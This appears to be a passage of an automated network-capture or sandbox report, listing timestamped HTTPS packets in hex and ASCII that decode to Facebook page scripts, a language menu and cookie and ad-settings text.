2c 22 68 4b 59 30 51 Data Ascii: be":1},"Form":{"r":["8zbEZtu","Z2GjVu9","vGt2mxz","QMm4GCm"],"be":1},"FormSubmit":{"r":["MCOESII","n6W4xMH","8zbEZtu","Z2GjVu9","vGt2mxz","h3ZzAmG","QMm4GCm"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent","BanzaiScuba_DEPRECATED"],"r":["BIylKC4","hKY0Q
2022-10-07 13:58:46 UTC	263	IN	Data Raw: 47 22 2c 22 4d 34 66 48 6f 4e 67 22 2c 22 58 39 6e 72 36 35 61 22 2c 22 5a 4c 6d 76 41 4b 71 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 4a 4f 4c 4c 30 34 32 22 2c 22 6b 77 53 79 46 6a 4e 22 2c 22 59 79 46 76 78 65 64 22 2c 22 5c 2f 6f 35 59 76 4f 32 22 2c 22 68 4b 59 30 51 4b 54 22 2c 22 4b 73 62 52 73 33 75 22 2c 22 47 70 51 46 42 77 4c 22 2c 22 62 7a 34 30 48 6f 72 22 2c 22 78 32 6c 72 47 41 57 22 2c 22 6b 4f 45 48 76 70 75 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 36 59 65 33 48 37 45 22 2c 22 59 30 65 38 68 30 41 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 6a 51 37 6e 5c 2f 39 6a 22 2c 22 35 56 78 43 64 34 48 22 2c 22 68 33 5a 7a 41 6d 47 22 2c 22 4f 4a 30 33 31 65 37 22 2c 22 52 70 4d 75 38 48 64 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 6e 41 47 52 49 34 69 22 2c Data Ascii: G","M4fHoNg","X9nr65a","ZLmvAKq","Z2GjVu9","JOLL042","kwSyFjN","YyFvxed","\/o5YvO2","hKY0QKT","KsbRs3u","GpQFBwL","bz40Hor","x2lrGAW","kOEHvpu","vGt2mxz","6Ye3H7E","Y0e8h0A","lWOvGTa","jQ7n\/9j","5VxCd4H","h3ZzAmG","OJ031e7","RpMu8Hd","BIylKC4","nAGRI4i",
2022-10-07 13:58:46 UTC	264	IN	Data Raw: 7a 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 51 4d 6d 34 47 43 6d 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 54 61 67 54 6f 6b 65 6e 69 7a 65 72 22 3a 7b 22 72 22 3a 5b 22 35 63 7a 51 35 77 54 22 2c 22 68 49 77 41 32 57 36 22 2c 22 74 6a 6d 6b 2b 30 4b 22 2c 22 51 4d 6d 34 47 43 6d 22 2c 22 5a 57 4a 38 78 38 55 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 43 71 52 43 4a 4b 6c 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 59 30 65 38 68 30 41 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 68 33 5a 7a 41 6d 47 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 46 6e 33 72 41 6c 37 22 2c 22 68 63 36 4d 59 58 55 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 2c 22 Data Ascii: z","BIylKC4","QMm4GCm"],"be":1},"TagTokenizer":{"r":["5czQ5wT","hIwA2W6","tjmk+0K","QMm4GCm","ZWJ8x8U","8zbEZtu","Z2GjVu9","CqRCJKl","vGt2mxz","Y0e8h0A","lWOvGTa","h3ZzAmG","BIylKC4","Fn3rAl7","hc6MYXU"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent"],"
2022-10-07 13:58:46 UTC	266	IN	Data Raw: 65 37 22 2c 22 52 70 4d 75 38 48 64 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 46 6e 33 72 41 6c 37 22 2c 22 52 50 4c 48 38 6a 67 22 2c 22 64 69 6f 67 56 61 75 22 2c 22 64 41 78 58 30 6a 6a 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 2c 22 73 72 50 6d 64 74 34 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 4b 73 62 52 73 33 75 22 2c 22 30 37 4a 53 69 50 30 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 2c 22 72 22 3a 5b 22 68 4b 59 30 51 4b 54 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 45 78 63 65 70 74 69 6f Data Ascii: e7","RpMu8Hd","BIylKC4","Fn3rAl7","RPLH8jg","diogVau","dAxX0jj","e9ANzw\/","srPmdt4","R5w1rCJ","KsbRs3u","07JSiP0"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent","Animation","PageTransitions","BanzaiScuba_DEPRECATED"],"r":["hKY0QKT"]},"be":1},"Exceptio
2022-10-07 13:58:46 UTC	267	IN	Data Raw: 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 2c 22 72 22 3a 5b 22 42 49 79 6c 4b 43 34 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 42 6f 64 79 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 59 74 55 33 43 35 75 22 2c 22 68 49 77 41 32 57 36 22 2c 22 73 72 50 6d 64 74 34 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 49 61 52 5c 2f 36 75 50 22 2c 22 6f 42 5c 2f 79 58 67 33 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 4c 38 59 63 49 6f 6e 22 2c 22 46 6e 33 72 41 6c 37 22 2c 22 30 37 4a 53 69 50 30 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 46 6f 6f 74 65 72 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 59 74 55 33 43 35 75 22 2c 22 68 49 77 41 32 57 36 22 2c 22 6a 31 76 63 Data Ascii: btLogging","IntlQtEventFalcoEvent"],"r":["BIylKC4"]},"be":1},"XUIDialogBody.react":{"r":["YtU3C5u","hIwA2W6","srPmdt4","R5w1rCJ","IaR\/6uP","oB\/yXg3","8zbEZtu","L8YcIon","Fn3rAl7","07JSiP0"],"be":1},"XUIDialogFooter.react":{"r":["YtU3C5u","hIwA2W6","j1vc
2022-10-07 13:58:46 UTC	269	IN	Data Raw: 68 49 77 41 32 57 36 22 5d 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 54 69 6d 65 53 6c 69 63 65 49 6d 70 6c 22 2c 22 53 65 72 76 65 72 4a 53 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 54 69 6d 65 53 6c 69 63 65 2c 53 65 72 76 65 72 4a 53 29 7b 76 61 72 20 73 3d 28 6e 65 77 20 53 65 72 76 65 72 4a 53 28 29 29 3b 73 2e 68 61 6e 64 6c 65 28 7b 22 64 65 66 69 6e 65 22 3a 5b 5b 22 4c 69 6e 6b 73 68 69 6d 48 61 6e 64 6c 65 72 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 73 75 70 70 6f 72 74 73 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 3a 66 61 6c 73 65 2c 22 64 65 66 61 75 6c 74 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 5f 70 6f 6c 69 63 79 22 3a 22 64 65 66 61 75 6c 74 22 2c 22 73 77 69 74 63 68 65 64 Data Ascii: hIwA2W6"]);});</script><script>requireLazy(["TimeSliceImpl","ServerJS"],function(TimeSlice,ServerJS){var s=(new ServerJS());s.handle({"define":[["LinkshimHandlerConfig",[],{"supports_meta_referrer":false,"default_meta_referrer_policy":"default","switched
2022-10-07 13:58:46 UTC	270	IN	Data Raw: 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 35 5f 6e 6d 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 36 5f 72 4b 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 37 5f 47 5c 2f 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 38 5f 65 5a 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 39 5f 62 56 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 61 5f 76 77 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 62 5f 68 48 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 63 5f 56 45 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 64 5f 6d 6e 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 Data Ascii: __markup_3310c079_0_5_nm","__markup_3310c079_0_6_rK","__markup_3310c079_0_7_G\/","__markup_3310c079_0_8_eZ","__markup_3310c079_0_9_bV","__markup_3310c079_0_a_vw","__markup_3310c079_0_b_hH","__markup_3310c079_0_c_VE","__markup_3310c079_0_d_mn","__markup_33
2022-10-07 13:58:46 UTC	272	IN	Data Raw: 73 68 20 28 55 4b 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 65 6e 5f 55 53 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 74 72 75 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 34 5f 4b 55 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 45 6e 67 6c 69 73 68 20 28 55 53 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 Data Ascii: sh (UK)","title":"","className":"headerItem"},{"class":"headerItem","value":"en_US","selected":true,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_4_KU"},"label":"English (US)","title":"","className":"headerItem"},{"class":"heade
2022-10-07 13:58:46 UTC	273	IN	Data Raw: 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 62 5f 68 48 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 4e 6f 72 73 6b 20 28 62 6f 6b 6d 5c 75 30 30 65 35 6c 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 70 6c 5f 50 4c 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 63 5f Data Ascii: ectableItem"},"markup":{"__m":"__markup_3310c079_0_b_hH"},"label":"Norsk (bokm\u00e5l)","title":"","className":"headerItem"},{"class":"headerItem","value":"pl_PL","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_c_
2022-10-07 13:58:46 UTC	275	IN	Data Raw: 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 74 72 5f 54 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6a 5f 4a 6b 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 54 5c 75 30 30 66 63 72 6b 5c 75 30 30 65 37 65 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 63 73 5f 43 5a 22 2c 22 73 65 6c 65 63 74 65 64 22 Data Ascii: rItem"},{"class":"headerItem","value":"tr_TR","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_j_Jk"},"label":"T\u00fcrk\u00e7e","title":"","className":"headerItem"},{"class":"headerItem","value":"cs_CZ","selected"
2022-10-07 13:58:46 UTC	276	IN	Data Raw: 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 74 68 5f 54 48 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 71 5f 72 31 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 65 32 30 5c 75 30 65 33 32 5c 75 30 65 32 39 5c 75 30 65 33 32 5c 75 30 65 34 34 5c 75 30 65 31 37 5c 75 30 65 32 32 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 Data Ascii: Name":"headerItem"},{"class":"headerItem","value":"th_TH","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_q_r1"},"label":"\u0e20\u0e32\u0e29\u0e32\u0e44\u0e17\u0e22","title":"","className":"headerItem"},{"class":"
2022-10-07 13:58:46 UTC	278	IN	Data Raw: 4f 6e 54 72 61 6e 73 69 74 69 6f 6e 22 2c 22 4c 61 79 65 72 52 65 6d 6f 76 65 4f 6e 48 69 64 65 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 50 5a 22 2c 22 48 54 4d 4c 22 5d 2c 5b 7b 22 77 69 64 74 68 22 3a 36 38 30 2c 22 61 75 74 6f 68 69 64 65 22 3a 6e 75 6c 6c 2c 22 74 69 74 6c 65 49 44 22 3a 6e 75 6c 6c 2c 22 72 65 64 69 72 65 63 74 55 52 49 22 3a 6e 75 6c 6c 2c 22 66 69 78 65 64 54 6f 70 50 6f 73 69 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 69 67 6e 6f 72 65 46 69 78 65 64 54 6f 70 49 6e 53 68 6f 72 74 56 69 65 77 70 6f 72 74 22 3a 66 61 6c 73 65 2c 22 6c 61 62 65 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 62 65 6c 6c 65 64 42 79 22 3a 22 6d 61 6e 61 67 65 5f 63 6f 6f 6b 69 65 73 5f 74 69 74 6c 65 22 2c 22 68 65 69 67 68 74 22 3a 35 31 Data Ascii: OnTransition","LayerRemoveOnHide","__markup_9f5fac15_0_0_PZ","HTML"],[{"width":680,"autohide":null,"titleID":null,"redirectURI":null,"fixedTopPosition":null,"ignoreFixedTopInShortViewport":false,"label":null,"labelledBy":"manage_cookies_title","height":51
2022-10-07 13:58:46 UTC	279	IN	Data Raw: 30 33 43 61 20 72 6f 6c 65 3d 5c 22 62 75 74 74 6f 6e 5c 22 20 63 6c 61 73 73 3d 5c 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 35 70 69 20 5f 32 61 67 66 20 5f 34 6f 5f 34 20 5f 39 6f 2d 65 20 5f 70 20 5f 34 6a 79 33 20 5f 35 31 37 68 20 5f 35 31 73 79 5c 22 20 68 72 65 66 3d 5c 22 23 5c 22 20 73 74 79 6c 65 3d 5c 22 6d 61 78 2d 77 69 64 74 68 3a 32 30 30 70 78 3b 5c 22 20 61 72 69 61 2d 68 61 73 70 6f 70 75 70 3d 5c 22 74 72 75 65 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 5c 22 66 61 6c 73 65 5c 22 20 72 65 6c 3d 5c 22 74 6f 67 67 6c 65 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 38 5f 7a 6f 5c 22 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 2d 78 65 20 5f 33 2d 38 5f 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 Data Ascii: 03Ca role=\"button\" class=\"_42ft _4jy0 _55pi _2agf _4o_4 _9o-e _p _4jy3 _517h _51sy\" href=\"#\" style=\"max-width:200px;\" aria-haspopup=\"true\" aria-expanded=\"false\" rel=\"toggle\" id=\"u_0_8_zo\">\u003Cspan class=\"_-xe _3-8_\">\u003Ci class=\"img
2022-10-07 13:58:46 UTC	281	IN	Data Raw: 76 69 63 65 73 20 66 6f 72 20 79 6f 75 2c 20 77 65 20 75 73 65 20 74 6f 6f 6c 73 20 66 72 6f 6d 20 6f 74 68 65 72 20 63 6f 6d 70 61 6e 69 65 73 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 2e 20 54 68 65 73 65 20 63 6f 6d 70 61 6e 69 65 73 20 61 6c 73 6f 20 75 73 65 20 63 6f 6f 6b 69 65 73 2e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 33 5c 22 3e 59 6f 75 20 63 61 6e 20 61 6c 6c 6f 77 20 74 68 65 20 75 73 65 20 6f 66 20 61 6c 6c 20 63 6f 6f 6b 69 65 73 2c 20 6a 75 73 74 20 65 73 73 65 6e 74 69 61 6c 20 63 6f 6f 6b 69 65 73 20 6f 72 20 79 6f 75 20 63 61 6e 20 63 68 6f 6f 73 65 20 6d 6f 72 65 20 6f 70 74 69 6f 6e 73 20 62 65 6c 6f 77 2e 20 59 6f 75 20 63 61 6e 20 6c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 Data Ascii: vices for you, we use tools from other companies on Facebook. These companies also use cookies.\u003C\/div>\u003Cdiv class=\"_9xo3\">You can allow the use of all cookies, just essential cookies or you can choose more options below. You can learn more abou
2022-10-07 13:58:46 UTC	282	IN	Data Raw: 6c 61 73 73 3d 5c 22 5f 39 73 69 2d 5c 22 3e 41 64 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 54 6f 20 73 68 6f 77 20 79 6f 75 20 62 65 74 74 65 72 20 61 64 73 2c 20 77 65 20 75 73 65 20 64 61 74 61 20 74 68 61 74 20 61 64 76 65 72 74 69 73 65 72 73 20 61 6e 64 20 6f 74 68 65 72 20 70 61 72 74 6e 65 72 73 20 70 72 6f 76 69 64 65 20 75 73 20 61 62 6f 75 74 20 79 6f 75 72 20 61 63 74 69 76 69 74 79 20 6f 66 66 20 46 61 63 65 62 6f 6f 6b 20 43 6f 6d 70 61 6e 79 20 50 72 6f 64 75 63 74 73 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 73 69 74 65 73 20 61 6e 64 20 61 70 70 73 2e 20 59 6f 75 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 77 68 65 74 68 65 72 20 77 65 20 75 73 65 20 74 Data Ascii: lass=\"_9si-\">Ad settings\u003C\/p>\u003Cp class=\"_9o-m\">To show you better ads, we use data that advertisers and other partners provide us about your activity off Facebook Company Products, including websites and apps. You can control whether we use t
2022-10-07 13:58:46 UTC	283	IN	Data Raw: 20 4c 6f 67 69 6e 20 6f 72 20 46 61 63 65 62 6f 6f 6b 20 50 69 78 65 6c 2c 20 74 6f 20 73 68 61 72 65 20 74 68 69 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 77 69 74 68 20 75 73 2e 20 54 68 69 73 20 68 65 6c 70 73 20 75 73 20 64 6f 20 74 68 69 6e 67 73 20 73 75 63 68 20 61 73 20 67 69 76 65 20 79 6f 75 20 61 20 6d 6f 72 65 20 70 65 72 73 6f 6e 61 6c 69 7a 65 64 20 65 78 70 65 72 69 65 6e 63 65 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 2e 20 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 68 65 6c 70 5c 2f 32 32 30 37 32 35 36 36 39 36 31 38 32 36 32 37 5c 22 3e 6f 66 66 2d 46 61 63 65 62 6f 6f 6b 20 61 63 74 69 76 69 74 79 5c 75 30 Data Ascii: Login or Facebook Pixel, to share this information with us. This helps us do things such as give you a more personalized experience on Facebook. Learn more about \u003Ca href=\"https:\/\/www.facebook.com\/help\/2207256696182627\">off-Facebook activity\u0
2022-10-07 13:58:46 UTC	285	IN	Data Raw: 34 6b 44 5f 48 6e 52 76 49 31 59 6e 44 45 42 43 41 72 70 4d 58 61 35 63 70 79 62 48 73 66 54 59 6b 6b 45 35 67 61 31 37 62 48 32 41 32 57 66 50 4b 4f 73 72 6d 48 59 79 67 56 77 79 53 6b 71 5a 6f 63 66 6d 31 4d 77 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 68 6f 76 65 72 5c 22 3e 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 20 6f 66 20 43 61 6e 61 64 61 5c 75 30 30 33 43 5c 2f 61 3e 20 69 6e 20 43 61 6e 61 64 61 20 6f 72 20 74 68 65 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c Data Ascii: 4kD_HnRvI1YnDEBCArpMXa5cpybHsfTYkkE5ga17bH2A2WfPKOsrmHYygVwySkqZocfm1Mw\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"hover\">Digital Advertising Alliance of Canada\u003C\/a> in Canada or the \u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\
2022-10-07 13:58:46 UTC	285	IN	Data Raw: 34 35 39 39 0d 0a 69 72 59 45 4a 4e 4a 34 56 47 4c 4e 53 65 49 75 4f 6a 41 78 72 51 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 68 6f 76 65 72 5c 22 3e 45 75 72 6f 70 65 61 6e 20 49 6e 74 65 72 61 63 74 69 76 65 20 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 5c 75 30 30 33 43 5c 2f 61 3e 20 69 6e 20 45 75 72 6f 70 65 2c 20 6f 72 20 74 68 72 6f 75 67 68 20 79 6f 75 72 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 20 73 65 74 74 69 6e 67 73 2c 20 69 66 20 79 6f 75 20 61 72 65 20 75 73 69 6e 67 20 41 6e 64 72 6f 69 64 2c 20 69 4f 53 20 31 33 20 6f 72 20 61 6e 20 65 61 72 6c 69 65 72 20 76 65 72 73 69 6f Data Ascii: 4599irYEJNJ4VGLNSeIuOjAxrQ\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"hover\">European Interactive Digital Advertising Alliance\u003C\/a> in Europe, or through your mobile device settings, if you are using Android, iOS 13 or an earlier versio
2022-10-07 13:58:46 UTC	287	IN	Data Raw: 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 79 6f 75 72 6f 6e 6c 69 6e 65 63 68 6f 69 63 65 73 2e 63 6f 6d 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 30 58 71 4f 75 4d 75 6d 75 6c 45 51 53 4a 66 61 61 51 42 6f 4d 72 56 77 65 53 72 51 73 6a 4a 38 4c 54 70 58 6d 76 49 32 4e 36 76 72 59 74 30 41 74 47 33 41 64 45 49 74 78 49 6e 4b 2d 58 4e 43 35 79 6e 73 78 6a 63 39 42 79 37 51 79 35 66 56 79 45 79 54 68 42 64 39 4b 6f 46 57 48 67 6b 4d 59 4a 47 46 68 30 46 45 6b 56 36 69 50 61 46 6c 61 2d 46 76 67 74 53 69 67 45 67 4e 48 59 68 68 46 6d 77 39 37 33 55 36 66 74 6b 7a 7a 77 6d 54 33 41 71 51 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 Data Ascii: php?u=https\u00253A\u00252F\u00252Fwww.youronlinechoices.com\u00252F&h=AT0XqOuMumulEQSJfaaQBoMrVweSrQsjJ8LTpXmvI2N6vrYt0AtG3AdEItxInK-XNC5ynsxjc9By7Qy5fVyEyThBd9KoFWHgkMYJGFh0FEkV6iPaFla-FvgtSigEgNHYhhFmw973U6ftkzzwmT3AqQ\" target=\"_blank\" rel=\"nof
2022-10-07 13:58:46 UTC	288	IN	Data Raw: 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 73 75 70 70 6f 72 74 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 5c 75 30 30 32 35 32 46 63 68 72 6f 6d 65 5c 75 30 30 32 35 32 46 61 6e 73 77 65 72 5c 75 30 30 32 35 32 46 39 35 36 34 37 26 61 6d 70 3b 68 3d 41 54 32 49 63 31 71 4e 39 71 33 4a 42 34 77 56 43 53 41 31 30 38 67 71 4e 4f 73 5a 52 54 73 31 6b 33 5f 62 46 75 4b 55 52 68 4e 5a 39 65 79 6e 62 63 4d 50 78 37 6c 74 76 5f 50 45 63 54 66 4d 30 73 77 4c 58 45 7a 69 6a 42 44 44 59 6b 47 79 63 4b 72 47 62 31 6f 43 57 75 70 71 66 62 77 70 5a 47 72 41 4b 38 4d 7a 44 4d 58 72 58 56 31 63 36 68 39 41 4b 6f 4f 5a 4f 45 38 62 34 50 6b 66 58 4e 55 5f 41 58 62 66 Data Ascii: l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fsupport.google.com\u00252Fchrome\u00252Fanswer\u00252F95647&h=AT2Ic1qN9q3JB4wVCSA108gqNOsZRTs1k3_bFuKURhNZ9eynbcMPx7ltv_PEcTfM0swLXEzijBDDYkGycKrGb1oCWupqfbwpZGrAK8MzDMXrXV1c6h9AKoOZOE8b4PkfXNU_AXbf
